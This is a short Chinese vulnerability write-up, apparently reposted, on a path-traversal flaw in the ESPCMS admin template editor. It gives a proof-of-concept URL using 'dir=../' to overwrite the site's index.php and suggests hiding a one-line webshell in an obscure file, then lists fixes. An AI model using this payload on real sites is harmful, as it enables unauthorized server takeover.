鸿 网 互 联 www.68idc.cn

espcms后台getshell-1

来源:互联网 作者:佚名 时间:2016-05-07 10:01
修改模板处未限制路径,可以通过../修改template目录以外的php文件,写入一句话。 (此处为了方便演示,写入了首页,写入了phpinfo,实际情况可以在隐蔽的文件写入一句话) 正常的修改是这样的 接下来,构造url http://127.0.0.1/espcms/adminsoft/index.php?
修改模板处未限制路径,可以通过../修改template目录以外的php文件,写入一句话。
 
(此处为了方便演示,写入了首页,写入了phpinfo,实际情况可以在隐蔽的文件写入一句话)
 
正常的修改是这样的
 
接下来,构造url
 
 
http://127.0.0.1/espcms/adminsoft/index.php?archive=templatemain&action=templateedit&dir=../&filename=index.php&type=edit&freshid=0.41100375866517425&iframename=jerichotabiframe_0&iframeheightwindow=617&iframewidthwindow=1430
 
成功可以修改首页了
 
写进phpinfo
 
 
 
成功
 
看看首页?
 

 
修复方案:

对文件路径进行限制,过滤../之类可跳出目录的特殊路径
 
禁止模板中写入php脚本 
 
网友评论
<